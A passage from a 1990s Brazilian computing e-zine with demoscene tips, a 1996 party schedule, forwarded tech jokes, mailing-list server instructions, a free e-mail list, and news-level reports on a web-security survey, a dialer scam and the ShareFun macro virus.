um belo portfolio de apresentacao. Os coders do Future , por exemplo ,
estao trabalhando num projeto de acelerador grafico 3D ( tipo MMX )
chamado Piramid3D pra Triangle Software enquanto o musico do grupo ta
compondo trilha prum jogo duma empresa cujo nome eu esqueci. Sem falar que
Psi ,um dos principais coders do Future ,inventou(eh inventou!)um padrao de
audio semelhante ao MOD soh pra incrementar ainda mais os demos(pra falar
a verdade ele nao foi o unico,varios outros coders inventaram padroes
semelhantes). Isso mostra que os caras alem de aprenderem a
programar/compor/desenhar os caras se dao bem gracas aos demos.
Se vc se interessou pelo demo-coding e deseja entrar nesse universo ai
vao algumas dicas/conselhos:
1)Os coders iniciantes podem comecar com o Pascal,uma vez que os
tutoriais para demo-coding sao em sua maioria sao nessa linguagem.
Contudo tenha em mente que se vc quiser ir alem do arroz-com-feijao tera
mais cedo ou mais tarde que cair no Assembler : puro ou com gelo(no caso
C);
2)Encare os demos como uma campanha publicitaria,afinal eles eh que vao
construir a imagem do seu grupo. Demos mais trabalhados chegam a levar de
tres a seis meses para serem feitos;
3)Aprenda com os codigos-fontes de demos disponiveis na rede ,mas em
hipotese alguma roube ideias de apresentacao. A essencia do demo-coding
esta em criar seus PROPRIOS demos usandos as tecnicas e macetes
aprendidos.
4)Troque informacao com seus colegas de grupo e com outros grupos.Claro,
existirah aquele algoritmo de rendering fantastico que alguem da sua turma
inventou e que nao seria vantajoso doar pra qualquer wanna-be,entao nesse
caso troque por um metodo de otimizacao de rotinas que a turma "rival"
inventou;
5)Os tutoriais distribuidos pela Net vao ser de grande valia. No endereco
ftp.cdrom.com vc encontra toneladas deles,contudo,lembre-se que eles nao
vao ensinar tudo.Na verdade estao bem longe disso,uma vez que sao so o
ponto de partida para voos mais altos. Se quer ser um fucking coder tera
que gastar tempo e dinheiro em livros. Nao eh facil e nao eh para todos,
infelizmente;
6)Vasculhe o Altavista e o Lycos usando "demoscene" como palavra chave;
6.1)Vasculhe tb as BBS's em busca de demos/informacao;
7)Um ultimo aviso:se por acaso voce quiser apenas pescar demos bacanas
na Net tenha o cuidado de contar com um bom anti-virus p/ fazer a
limpeza,pois nunca sabemos ao certo o que nos estamos levando para
casa.>:=/
Segue anexo um roteiro de uma party supostamente realizada no final do
ano passado na Belgica:
=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4[ 10. PARTY S=
CHEDULES ]=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4=C4
FRIDAY 01.11.96
11: Party doors open
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22: Deadline Ansi Competition
23: Deadline Music Competition
24: Concert TRAXX Live.
SATURDAY 02.11.96
01: Deadline Graphic & Raytrace Graphic Competition
02: Ansi Competition Starts
03:
04:
05:
06: Graphic Competition Starts
07: Raytrace Competition Starts
08:
09: Music Competition Starts
10:
11: Deadline 4k intro
12:
13:
14: 4k intro competition starts
15:
16: Deadline 64k intro compo
17:
18: Deadline Demo Competition
19:
20:
21: 64k intro Compo Starts
22:
23: Demo Competition Starts
24:
SUNDAY 03.11.96
01:
02:
03: Deadline Raytrace Movie
04:
05:
06:
07: Raytrace Movie Competition Starts
08:
09: DEADLINE FOR VOTING
10:
11:
12:
13:
14: PRIZE CEREMONY
15:
16:
17: Party Doors Close
=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4[ 11. DISCLAIMER ]=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4=C4=C4=C4=C4=C4=C4
---------------------------------------------------------------------------
NEWS - PIADAS - BUGS - LINUX - DICAS - ETC..
============================================
PIADAS e FATOS ENGRACADOS
Subject: [PIADAS-L] Voce se considera ignorante em computadores?? (fwd)
Entao verifique os casos ocorridos abaixo, de um artigo do Wall Street
Journal por Jim Carlton:
1. A Compaq esta' pensando em mudar o comando "Press Any Key" por causa da
enxurrada de consultas tecnicas perguntando sobre onde fica a tecla "Any".
2. O suporte tecnico da AST tem uma chamada de uma mulher reclamando que o
mouse dela e' de dificil controle. Descobriu-se que era porque ela nao
tinha retirado o plastico que o protege contra po'.
3. Um tecnico de suporte da Compaq recebeu uma chamada reclamando que o
sistema nao conseguia ler os arquivos de seus diskettes mais antigos.
Depois de varios testes infrutiferos nos drives, descobriu que o usuario
colocava etiquetas nos diskettes e os introduzia na maquina de escrever
para datilografar as etiquetas.
4. Um usuario foi solicitado a enviar uma copia de seus diskettes
defeituosos. Alguns dias depois chegou uma carta do usuario com copias
xerox dos diskettes.
5. Um tecnico da Dell orientou seu cliente para colocar seu diskette com
problemas de volta no drive A: e fechar a porta. O cliente disse para o
tecnico esperar um pouco, deitou o telefone sobre a mesa, atravessou a sala
e foi fechar a porta da sala.
6. Um usuario da Dell chamou o suporte tecnico reclamando que seu
computador nao conseguia enviar nenhum fax. Depois de 40 minutos tentando
achar o erro, descobriu que o usuario estava tentando enviar o fax
colocando a folha de papel na frente do monitor e clicando o botao "Send
Fax".
7. Outro usuario da Dell reclamou que seu teclado nao mais estava
funcionando. Como o teclado estivesse muito sujo, ele lavou-o na pia e
deixou-o secando noite. Depois tirou todas as teclas e lavou-as com agua e
sabao.
8. O suporte tecnico da Dell recebeu uma chamada de um usuario furioso
porque seu computador havia-lhe chamado de "ruim e invalido". O tecnico
explicou que a frase se referia a um comando e nao devia ser tomada a nivel
pessoal.
9. Uma usuaria desesperada chamou a Dell porque nao conseguia ligar seu
computador. Depois de se assegurar que o havia ligado na tomada, o tecnico
perguntou-lhe o que acontecia quando ela apertava o botao de ligar. Ela
respondeu que pisava e pisava no
pedal e nada acontecia. O pedal era o mouse.
10. Uma usuaria ligou para a Compaq dizendo que seu computador novo nao
funcionava. Ela disse que tirou o computador da embalagem, ligou-o na
tomada, esperou 20 minutos e nada aconteceu. Quando perguntada sobre o que
ocorria quando ela apertava o botao de ligar ela respondeu: "Que botao de
ligar?".
---------------------------------------------------------------------------
"E comovente a historia de um Sysop da Novell Netware atendendo a um
telefonema
- Departamento Tecnico, posso ajuda-lo?
- Sim, o problema e o seguinte: o suporte de copos de meu PC quebrou. Mas
ele ainda esta na garantia e gostaria de conserta-lo.
- Suporte de copos?
- Sim, fica bem na frente do computador.
- Desculpe, mas isso nao faz parte de nossa configuracao. Onde o Sr.
comprou o suporte: numa loja, numa feira? E importado? Ele tem alguma marca
de fabricante?
O usuario entao responde:
- Nao, ele veio com a maquina. Esta escrito 4X.
[]'s
----------------------------------------------------------------
Fabricio A.M.
Subject: [PIADAS-L] (fwd)
Todos sabem (exceto os que ignoram) que temos hoje capacidade de fazer uma
esfera virtual (um "planeta") de qualquer tamanho, colocar nela trilhoes de
informacoes, e gerar "seres" que aprenderao a historia que acabamos de
criar e acreditarao que vivem num mundo que tem milhoes de anos. E se
fossemos nos, tambem, aqui na Terra, uma mera experiencia de Deus,
recem-criada? Pessoalmente, acredito nesta hipotese, sobretudo depois que,
atraves de minha interface informatica (o geologo Gravata), recebi este
documento secreto, conhecido apenas por 80 milhoes de usuarios da internet:
NO PRINCIPIO DEUS USOU O UNIX...
pois no principio so havia Deus Todo-Poderoso e o sistema UNIX ("ewe-niks",
na intimidade), multitask e multiusuario, tambem todo-poderoso. Aqui,
unixemente, % e Deus e #, UNIX.
% "Faca-se a luz!"
# Entre identificacao usuario.
% Deus.
# Entre senha.
% Onisciente.
# Senha incorreta. Tente de novo.
% Onipotente.
# Senha incorreta. Tente de novo.
% Tecnocrata.
# E Deus acessou o sistema as 12:01:00, domingo, 1 de abril. Estabeleca
seu credito.
% US$ 100.00
# Confirmado. US$ 100.00
% Faca-se a luz!
# Comando inexistente. Tente de novo.
% Invente-se a luz!
# Feito.
% Rodar Ceu e Terra.
# E Deus criou o Dia e a Noite. E Deus viu que havia 0 (zero) erros.
# # E Deus saiu do sistema as 12:02:00, domingo, 1 de abril.
# # # Saldo de Deus Todo-Poderoso: US$ 98.50
# # # # Deus voltou a acessar o sistema as 12:01:00 da segunda-feira, 2 de
abril.
% Haja firmamento no meio das aguas e da luz.
# Comando irreconhec!vel. Tente de novo.
% Criar firmamento.
# Feito.
% Rodar firmamento.
# E Deus dividiu as aguas. E Deus viu que havia 0(zero) erros.
# # E Deus desconectou as 12:02:00 de segunda-feira, 2 de abril.
# # Saldo restante: US$ 91.40
# # # E Deus voltou ao sistema as 12:01:00, terca-feira, 3 de abril.
% Faca-se com que todas as aguas sob o Firmamento se juntem e que a Terra
Seca surja em meio a elas.
# Excesso de caracteres - imposs!vel compactar comando. Tente de novo.
% Criar Terra Seca.
# Feito.
% Rodar Firmamento.
# Comando obedecido. Aguas divididas. E Deus viu que havia 0 (zero) erros.
# # Deus desconectou as 12:02:00, terca-feira, 3 de abril.
# # # Saldo: US$ 67.10
# # # # Deus reconecta as 12:01:00, terca-feira, 4 de abril.
% Criar Luzes no Firmamento para dividir dia e noite.
# Tipo de tecnologia nao especificado. Tente de novo.
% Criar um Sol, uma Lua e 100 mil Estrelas.
# Feito.
# # Deus criou os Ceus. E Deus viu que havia 0 (zero) erros.
# # # Deus desconectou as 12:02:00, quarta-feira, 4 de abril.
# # # # Saldo: US$ 61.00
# # # # # Deus reconectou as 12:01:00 da quinta-feira, 5 de abril.
% Criar peixes.
# Feito
% Criar aves de modo geral e Ovo de galinha em particular. Caprichar na
embalagem.
# Aves criadas. Imposs!vel Ovo so de galinha. Tente de novo.
% Criar Ovo generico, inclusive para jacare. Caprichar na embalagem do Ovo
generico
# Feito.
% Rodar peixes, aves, ovos.
# Deus criou os Monstros marinhos e todas as criaturas vivas ate as aguas
se escurecerem com rebanhos e cardumes de peixes e semelhantes e o ceus
ficarem cheios com todos os animais alados. E Deus viu que havia 0 (zero)
erros.
# # Deus desconectou as 12:02:00 da quinta-feira, 5 de abril.
# # # Saldo remanescente: US$49.74
# # # # Deus reconecta as 12:01:00, sexta-feira, 6 de abril.
% Criar o gado.
# Feito.
% Criar as coisas rateiras, horripilantes, hediondas e nojentas.
# Feito.
% Fazer o homem a nossa imagem.
# Caracteristicas nao especificadas. Tente de novo.
% Criar o homem de qualquer maneira.
# Feito.
% Fazer o homem multiplicar e povoar a Terra e dominar os peixes no mar,
as aves do ar, e ter ascend^Hncia sobre todas as coisas que rastejam sobre a
Terra.
# Excesso de comandos simultaneos. Tente novamente.
% Rodar multiplicai.
# Comando realizado. 7 erros.
% Incluir respirar.
# Feito.
% Repetir multiplicar sem limite.
# Execucao completa. 4 erros.
% Mover homem para Jardim do eden.
# Feito.
% Rodar multiplicai. Sem limite.
# Execucao terminada. 3 erros.
% Inserir mulher no homem.
# Parametros invertidos. Retifique.
% Inserir homem na mulher.
# Feito.
% Rodar multiplicai.Sem limite.
# Operacao executada. 345 erros.
% Criar desejo.
# Feito.
% Rodar multiplicai. Sem limite.
# E Deus viu o homem e a mulher sendo frutiferos e multiplicando no Jardim
do eden. 666 erros.
* Atencao: Rodar sem limite de tempo. 4212 erros.
% Criar livre arbitrio.
# Feito.
% Rodar livre arbitrio.
# Feito.
% Eliminar desejo.
# Desejo nao pode ser eliminado devido a criacao do livre arbitrio.
% Destruir livre arb!trio.
# Livre arbitrio e arquivo inacessivel e nao pode ser destruido.
* Acione tecla de substituicao, cancelamento ou help.
% Criar arvore da ciencia do conhecimento.
# E Deus viu o homem e a mulher sendo frutiferos e multiplicando no
Jardim do eden, ja nao respeitando parametros estabelecidos.
% Criar o bem e o mal.
# Feito.
% Ativar mal.
# E Deus viu que tinha criado a vergonha.
* Atencao: Erro do sistema na ultima operacao E96. Homem e mulher nao estao
em Jardim do eden. 4277732 erros.
% Scannear Jardim, E.D.E.N. homem-mulher.
# Busca negativa.
% Apagar vergonha.
# Vergonha nao pode ser apagada com mal ativado.
% Destruir livre arb!trio.
# Arquivo incessivel. Nao pode ser destruido.
* Acione tecla de substituicao, cancelamento ou help.
% Interromper programa!
# Exclamacao imperativa torna comando irreconhec!vel. Tente interrogacao
ou Help.
% Suspender programa.
% Suspender programa.
% Suspender programa, porra!
# Atencao todos usuarios. Atencao todos usuarios. Sistema desligado para
manutencao rotineira.
Por favor, desliguem.
% Criar novo mundo.
# O usuario ultrapassou o espaco-tempo estatico-dinamico do arquivo
criacao. Eliminar arquivos anteriores para que novos arquivos possam ser
alocados.
% Destruir Terra.
# Destruir Terra, confirmar.
% Destruir Terra, confirmado.
# Terra destruida. Confirmado. Desligando sistema. Dez segundos para
sistema fora do ar . Saldo final: US$ 0.00
[]'s
----------------------------------------------------------------
Fabricio A.M.
Prezado L. A. Mo.
*************************************************
O Info-rama WIRED
------------------
O texto COMPLETO (menos propaganda) de todas os numeros anteriores
da revista wired (e texto adicional que nao foi incluido na revista)
esta' disponivel via email.
Mande e-mail para:
info-rama@wired.com
sem subject e com as palavras:
get help
No corpo da mensagem. Vao enviar uma mensagem explicando como usar
o Info-rama (nome do servico) para pedir arquivos da revista WIRED.
Exemplo:
Para pegar o arquivo de help e o arquivo de indice principal
coloque:
get help
get faq
get master.index
end
O "end" em seguida e' para evitar que a signature acione ou devolva
mensagem de erro. A sintaxe e' sempre:
get
end
Sempre usando o info-rama@wired.com. Uma dica pra pegar a lista de
todos os arquivos anteriores e' usar o comando
get back.back.issues
end
Faz um tempo que nao uso isso, entao pode haver um erro nesse ultimo
arquivo. De resto, se virem. (texto mais ou menos copiado do help do
info-rama e traduzido por Derneval).
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
ESQUINA DAS LISTAS - PERGUNTAS MAIS FREQUENTES
Subject: Listas `a torto e `a direito
#################################################
# #
# Introdu,c~ao `a Esquina das Listas #
# ---------------------------------- #
# (atrav'es de exemplos) #
# #
# Esquina-das-Listas@dcc.unicamp.br #
# #
#################################################
Autor: Marcos J. C. Euz'ebio
--------
| 1) Que esquina 'e esta?
--------
J'a foi mais f'acil explicar o que 'e a
esquina-das-listas. Ou talvez, eu a conhecia
menos. Quer dizer no in'icio havia
um servidor de listas "tropicalizado",
algumas listas e alguns usu'arios.
Hoje o servidor de listas 'e apenas uma parte,
cada vez menor, da esquina-das-listas. O
n'umero de listas aumentou e o n'umero de
usu'arios tamb'em.
Ou seja, a esquina-das-listas tem muitas
facetas. A principal delas 'e formada
pelas m'ultiplas comunidades, que
reunidas em torno de um tema, utilizam a
face operacional da esquina para trocar
id'eias.
Estas id'eias s~ao difundidas de v'arias
maneiras. Por correio-eletr^onico e
pelo WWW, atualmente. No futuro pretende-se
fazer a distribui,c~ao na Usenet e por
ftp tamb'em.
--------
| A quem se destina?
--------
A Esquina da Listas est'a aberta a todos
que tem acesso `a internet. A distribui,c~ao
autom'atica de mensagens, por correio
eletr^onico, a assinantes est'a restrita
aos provedores dispostos a colaborar com
a tarefa. Detalhes do funcionamento
da esquina-das-listas podem ser obtidos
em outro documento. Escreva para
esquina-das-listas@dcc.unicamp.br e coloque,
no in'cio da mensagem,
ciranda
para receb^e-lo.
O acesso ao reposit'orio de mensagens
da esquina n~ao est'a sujeito a nenhuma
restri,c~ao. A vers~ao www do reposit'orio
encontra-se na url:
http://www.dcc.unicamp.br/esquina-das-listas/esquina.html
As mensagens tamb'em podem ser solicitadas, uma-a-uma,
do reposit'orio, por correio eletr^onico. Vide os
comandos indice e envie abaixo.
--------
| Quais os endere,cos da esquina?
--------
S~ao os seguintes:
mailto:esquina-das-listas@dcc.unicamp.br
http://www.dcc.unicamp.br/esquina-das-listas/esquina.html
news: (em implanta,c~ao)
ftp: (em implanta,c~ao)
--------
| Como participar da esquina?
--------
A participa,c~ao, ativa, na esquina 'e
intermediada pelo servidor da esquina.
Ou seja, toda contribui,c~ao ou pedido
administrativa deve ser enviada,
por correio eletr^onico, ao servidor
da esquina (esquina-das-listas@dcc.unicamp.br).
Os pedidos podem conter um ou
mais comandos. Comandos devem
come,car no in'icio da linha e 'e
permitido apenas um comando por
linha. Se o comando for muito
longo e n~ao cabe em uma s'o
linha pode-se continuar na linha
seguinte, deixando um ou mais
espa,cos em branco no in'icio
da continua,c~ao.
--------
| Como parar de receber uma lista?
--------
Para interrromper a vinda de mensagens
de uma lista, mpb, p. ex., envie o
comando:
cancele mpb
Voc^e deve adicionar o endere,co de
assinatura, quando ele for diferente
do endere,co de envio da mensagem.
Se voc^e n~ao sabe sob qual o endere,co
est'a a assinatura utilize o comando
usuarios, que permite fazer pesquisas
sobre a rela,c~ao de usu'arios da
esquina. Por exemplo:
usuarios futebol jose
vai devolver a rela,c~ao dos assinantes
da lista futebol que jose no
seu endere,co.
--------
| Como se inscrever em uma lista?
--------
Para assinar a lista formula-1, por exemplo,
seu pedido deve conter um comando assim:
inscreva formula-1
Inclua o endere,co eletr^onico de
assinatura se ele 'e diferente do que
aparece na sua mensagem.
A inscri,c~ao em uma lista n~ao garante
a recep,c~ao autom'atica de todas as
mensagens submetidas `a mesma. Primeiro
porque a distribui,c~ao s'o feita aos
provedores cadastrados e aderentes ao
esquema de distribui,c~ao da esquina. Em segundo
lugar as condi,c~oes de tr'afego na
internet podem dificultar ou at'e impedir
a entrega de mensagens.
--------
| E para submeter uma contribui,c~ao?
--------
Para enviar um artigo para a
lista futebol inclua o comando
submeta futebol
na primeira linha do seu artigo.
Evite excesso de cita,c~oes (linhas
obtidas em outras mensagens e que comecem
com o caracter ">").
Mensagens muito longas poder~ao n~ao ser
distribu'idas para todos os usu'arios. O
sistema de distribui,c~ao imp~oe um limite
de tempo para o envio de uma mensagem.
Se o limite 'e ultrapassado a mensagem
n~ao 'e enviada.
Embora o t'opico esteja fora do escopo deste
guia, 'e sempre bom lembrar que a observ^ancia
de normas m'inimas de educa,c~ao e bom senso
s~ao ainda mais importantes no meio eletr^onico.
Ao respeit'a-las voc^e estar'a dando
um bom exemplo, contribuindo para a
para a melhoria da qualidade da intera,c~ao
e conviv^encia entre os participantes da
esquina e minimizando dores de cabe,ca para
voc^e mesmo. Dois conselhos que fazem
parte do folclore da net s~ao: n~ao irrite
e n~ao se irrite!
A esquina permite a realiza,c~ao de
"cross-postings": submiss~ao simult^anea
de uma mensagem para v'arias listas (da
esquina). O abuso desta facilidade
irrita muita gente.
--------
| Quais as listas dispon'iveis?
--------
A rela,c~ao completa das listas dispon'iveis
pode ser obtida atrav'es do comando:
listas
--------
| Como solicitar mensagens do reposit'orio da esquina?
--------
As mensagens submetidas `a esquina ficam
armazenadas em um reposit'orio por um tempo
limitado (sete dias, atualmente). C'opias
destas mensagens podem ser solicitadas
por correio eletr^onico. Dois comandos s~ao
necess'arios para a utiliza,c~ao deste servi,co.
O comando
indice religiao
retorna uma rela,c~ao das mensagens,
submetidas `a lista religi~ao, p.ex.,
e que est~ao dispon'iveis no reposit'orio.
Na rela,c~ao aparece a identifica,c~ao
associada a cada mensagem e que deve
ser usada para solicit'a-la.
Para solicitar de uma determinada
mensagem 'e necess'ario saber a identifica,c~ao
da mesma. Depois 'e s'o enviar o comando
envie religiao/1-1
para a esquina para receber a
c'opia da mesma.
Este servi,co est'a aberto a todos os
usu'arios, indepente da posi,c~ao
do provedor com rela,c~ao `a esquina.
--------
| Como obter informa,c~oes sobre os usu'arios da esquina?
--------
O cadastro dos usu'arios da esquina pode ser
pesquisado com a utiliza,c~ao do comando
usuarios. Este comando permite a realiza,c~ao
de buscas variadas. Por exemplo:
usuarios mpb
Fornece a rela,c~ao dos participantes
da lista mpb, neste caso.
usuarios iacec.unicomp.br
Devolve a rela,c~ao das assinaturas
provenientes do Inst. de Artes, Ci^encias
e Engenharias de Computa,c~ao da Universidade
de Compinas.
usuarios iacec.unicomp.br mpb
Restringe `a assinaturas da lista mpb
usuarios mpb jose
Restringe a busca aos assinantes da
da lista mpb em que aparece a palavra jose.
usuarios jose
Restringe a busca aos assinantes
em que aparece a palavra jose
--------
| Outros comandos?
--------
Sim, dois:
info
Para receber a vers~ao corrente desta mensagem. (10.mar.1997)
fim
Indica que n~ao tem mais
comandos na mensagem. Funciona como
a barreira para impedir que o servidor
da esquina invente de tentar interpretar
assinaturas, p. ex., como comandos.
--------------
| Reclama,c~oes
--------------
A esquina n~ao disp~oe de um servi,co
de atendimento ao usu'ario. Reclama,c~oes,
d'uvida, pedidos de aux'ilio devem ser submetidos
`a lista esquina.
Se voc^e assina a lista esquina sinta-se
a vontade para responder as d'uvidas dos
seus colegas. Se poss'ivel envie a resposta
tamb'em para a lista esquina, com isto
outros tamb'em se beneficiar~ao.
Outra forma de colaborar 'e na elabora,c~ao
de faq's (Quest~oes frequentes e respostas).
Elas auxiliam aos novos assinantes entrar
no contexto da lista, al'em de evitar
a repeti,c~ao de perguntas frequentes.
Se voc^e sente-se preparado para preparar
uma faq para alguma lista v'a em frente.
A faq deve ser enviada periodicamente `a
lista.
--------
| E para criar uma lista?
--------
O processo de cria,c~ao de uma lista no
servidor da esquina das listas 'e um tanto
trabalhoso e exige uma certa bagagem na
utiliza,c~ao de correio eletr^onico, de modo
geral, e da esquina-das-listas, em particular.
Se voc^e est'a disposto a criar uma lista
'e recomendado, antes de mais nada, que se
inscreva na lista esquina. Nesta lista
s~ao tratados de assuntos ligados `a
administra,c~ao e utiliza,c~ao da
esquina-das-listas. C'opias de mensagens
relacionadas ao processo de cria,c~ao de
uma lista devem ser enviadas para l'a.
O processo de cria,c~ao de uma lista na
esquina-das-listas 'e p'ublico e a participa,c~ao
'e aberta a todos integrantes da internet.
Para que sua lista seja criada 'e importante
que voc^e entenda os passos a serem listados
a seguir e os siga. Caso contr'ario sua
lista _n~ao_ ser'a criada.
0- Consulta e Discuss~ao
---------------------
Nesta fase, informal, o proponente da lista deve
conversar com seus colegas e participantes
de listas voltadas para assuntos
parecidos com o da lista que ele pretende
criar. Porque destas conversas? Pelos
motivos abaixo:
. escutar a opini~ao de terceiros sobre
a exist^encia da necessidade da lista;
. verificar se j'a n~ao existe alguma outra
lista de mesmo tema que a lista proposta;
. sondar a rea,c~ao e o impacto que a lista
vai causar nas outras pessoas.
Quanto tempo deve durar esta fase? O
tempo que o proponente considerar oportuno.
Ou seja, quando ele para quando j'a tiver recolhido
subs'idios suficientes para decidir
com seguran,ca sobre a continua,c~ao ou
n~ao do processo de cria,c~ao da lista.
Se a resposta foi positiva e o proponente
acredita que a lista ser'a bem
recebida ele pode passar, com tranquilidade,
para o passo seguinte.
1- Vota,c~ao
---------
O objetivo desta fase 'e confirmar
a aprova,c~ao da lista pelos usu'arios
da internet. Estas fase 'e mais formal
e est'a sujeita a algumas regras importantes.
O in'icio desta fase 'e indicado pelo
envio de uma mensagem que vai registrar
o pedido de cria,c~ao da lista. Esta
mensagem dever'a ser distribu'ida
na lista esquina.
A mensagem deve ser enviada `a
esquina-das-listas@dcc.unicamp.br e
dever'a conter o comando:
submeta esquina
Abaixo deste comando a mensagem dever'a
conter a ficha de cria,c~ao da lista, contendo
v'arias informa,c~oes:
. nome da lista proposta.
. escopo da lista: descri,c~ao dos objetivos
da lista, p'ublico alvo e outras
informa,c~oes que o proponente considerar
pertinentes.
. orienta,c~ao aos votantes:
- prazo de vota,c~ao:
data final da vota,c~ao (prazo m'inimo
de duas semanas);
- endere,co de vota,c~ao: endere,co para
o envio de votos. (Os votantes
devem ser instru'idos a n~ao mandarem seus
votos para listas, apenas para o(s)
endere,co(s) indicados.)
- formato do voto SIM: que mensagem deve
ser enviada para o endere,co de vota,c~ao
para indicar a _aprova,c~ao_ da lista
proposta.
- formato do voto NAO: que mensagem deve
ser enviada para o endere,co de vota,c~ao
para indicar a _desaprova,c~ao_ da lista
proposta.
IMPORTANTE: A organiza,c~ao e condu,c~ao
da vota,c~ao 'e tarefa de responsabilidade
do proponente da lista.
2- Divulga,c~ao dos Resultados e Averigua,c~ao
-------------------------------------------
O resultado final da vota,c~ao dever'a ser
divulgado pelo proponente da lista
tamb'em na lista esquina.
Isto 'e feito atrav'es do envio de uma
mensagem para: esquina-das-listas@dcc.unicamp.br
e conter'a o comando:
submeta esquina
Abaixo deste comando dever'a vir a
lista completa dos endere,cos dos
votantes e uma indica,c~ao clara de
suas op,c~oes: a favor ou contra a aprova,c~ao
da lista proposta.
Ser'a dado um prazo de uma semana para que
os resultados possam ser verificados pelos
votantes e demais usu'arios da esquina.
Qualquer suspeita de fraude tornar'a nulo
todo o processo; abortando a cria,c~ao da lista.
Se a lista receber um n'umero de aprova,c~oes
razo'avel e o a rea,c~ao negativa a cria,c~ao
da mesma n~ao for muito grande, a lista
ser'a criada pelo administrador da
esquina-das-listas.
Listas Inativas
--------------
As listas que que n~ao tiverem nenhuma movimento
no per'iodo m'inimo de tr^es meses poder~ao
ser descontinuadas.
(mjce/1997.abril.19)\
-----------------------------------------------
FREE E-MAIL
===========
1. NetForward
http://www.netforward.com
2. HoTMaiL
http://www.hotmail.com
3. Trale
http://www.trale.com
4. WWDG Free Email
http://www.wwdg.com/email/
5. MailMasher
http://www.mailmasher.com
6. StarMail - Over 100 domains to choose from!!
http://www.starmail.com
7. iName - Over 100 domains to choose from!!
http://www.iname.com
8. Geocities
http://www.geocities.com
9. Juno
http://www.juno.com
10. Net@ddress
http://netaddress.usa.net
11. Bigfoot
http://www.bigfoot.com
12. MailHost
http://www.mailhost.net
13. POBox
http://pobox.com/pobox/
14. POBoxes
http://www.poboxes.com
15. PEmail
http://www.pemail.net
16. La Jolla Shores
http://www.lajollashores.com
17. From.Net
http://from.net
18. iName
http://www.unforgettable.com
19. Four11
http://www.four11.com
Lenimar N. A.(retirado do jampa@lists.americasnet.com)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
BUGS E ETC..
E D U P A G E
21 de janeiro de 1997 | Portugues
FALHAS DE SEGURANCA NA REDE
Dan Farmer, autor do software SATAN que foi projetado para entrar as
falhas nos sistemas de seguranca dos sitios na Web, acaba de realizar
uma pesquisa nao cientifica em aproximadamente 2.200 sitios na Web e
encontraram de 70 a 80% "falhas serias de seguranca". A pesquisa foi
feita entre 1.700 sitios "de maior popularidade" e outros 500
selecionados de forma aleatoria. Nos sitios de maior popularidade
encontrou-se o dobro do percentual em problemas de seguranca do que
aquele encontrado na amostra selecionada aleatoriamente. "Muitos dos
sitios realmente interessantes estao fazendo malabarismos", explicou
Farmer. "Estao oferecendo uma gama de servicos - correio eletronico,
noticias sobre a Internet, contas de usuario e outros do genero. Tais
servicos nao sao dificeis de manter no ar. Mas comece a colocar
"bolinhas" la' e perde-se o controle ... Simplesmente e' dificil
manejar tudo isso durante muito tempo. E, de tempos em tempos, reclama-se
dos empregados responsaveis por manter tudo em funcionamento - nao
necessariamente com seguranca. Os administradores de sistemas quase
nunca obtem o orcamento e treinamento adequados para implanta-los com
seguranca e de forma apropriada". Dos 660 bancos revisados, uns 68%
contam com sitio que Farmer considera altamente vulneravel.
Investor's Business Daily 20 jan 97 A6
-----------------------------------------
Nao sei de onde recebi isto:
Foi reportado hoje um novo golpe perpetrado via internet! Funciona da
seguinte maneira: Voce vai a um homepage onde te avisaram (via e-mail ou qq
outra maneira) que tem imagens pornograficas, ou mulheres ao vivo, ou
alguma coisa de esportes, etc., qq que eles tenham visto que seja de seu
interesse ou que lhe aguce a curiosidade. Nesta homepage, eles lhes pedem
que baixem e instalem um software gratuito, para lhe permitir ver as
imagens ou filmes, etc., alegando que os mesmos tem formato proprietario ou
algo assim.
Ai e' que entra o golpe. Na hora em que voce usa o tal software, ele faz
uma conexao via uma ligacao telefonica de larga distancia, para fora dos
EUA, atraves de uma companhia que vai cobrar entre 1 a 2 dolares por
minuto! E pior, mesmo quando voce para de usar o tal leitor de imagens ou
mesmo o seu browser, a conexao continua ativa, so' se desligando quando
voce desligar o computador!!! Se voce foi a alguma homepage assim, apague
imediatamente o tal leitor.
Inumeras pessoas cairam neste golpe e se viram com contas absurdas no final
do mes!!!
Avise a todos os internautas que voce conhecer.
--
noticia vinculada pelo Universo OnLine:
>Novo virus de macro ataca MS Mail
>da Universo Online
>
>A empresa de antivirus McAffee localizou um novo
virus de marco que
>manda mensagens ao acaso de pessoas que usam o
Microsoft MS Mail.
>
>"ShareFun" e' o nome do virus, que e' simples de
detectar e prevenir.
>Como todos os virus transmissmveis por correio
eletronico, ele e'
>mandado num "attachment". Para "pegar" o virus, o
usuario precisa
>executa-lo - geralmente com um clique duplo sobre o
"attachment".
>
>Usuarios experientes evitam abrir "attachments" de
que n{o sabem a
>origem. Segundo a McAffee, este i o grande problema
do "ShareFun".
>Ele pode ser enviado por um amigo.
>
>A McAffee descobriu a existjncia do vmrus atravis de
um cliente. Uma
>grande corpora|{o suspeitou que seu sistema estava
infectado. Um
>funcionario da McAffee explicou que geralmente a
mensagem vem com
>o assunto "You have to see this"! Quando a
mensagem i aberta, esta
>em branco. Se o usuario clicar no "attachment",
quando o Word o abre,
>o vmrus i iniciado.
>
>O vmrus tem uma chance em quatro de voltar para o
MS Mail e mandar
>automaticamente mensagens com "attachments" dele
mesmo para trjs
>pessoas na lista de endere|os do programa.
>
>A cada vez que o Word i aberto, o vmrus fica ativo de
novo e tem uma
>chance de 25% de ser mandado atravis do sistema de
mail.
>
>O problema deste vmrus i que, a cada vez que ele
manda uma mensagem,
>ele envia o documento em que a pessoa estiver
trabalhando no momento.
>Se ela estiver trabalhando num texto confidencial, por
exemplo, ele
>sera enviado a trjs pessoas, ao acaso.
>
>Segundo a Microsoft, o MS Mail esta sendo
descontinuado e substitumdo
>pelo Exchange. O Word 97 tem uma fun|{o que
detecata qualquer macro -
>seja ou n{o um vmrus. Quem n{o tiver o Word 97
podem copiar a fun|{o
>no site da Microsoft.
Fonte ==>
http://www.uol.com.br/internet/flashvox/fla2102.htm
Ja' andei conferindo no site da McAfee e la' eles
confirmam o virus,
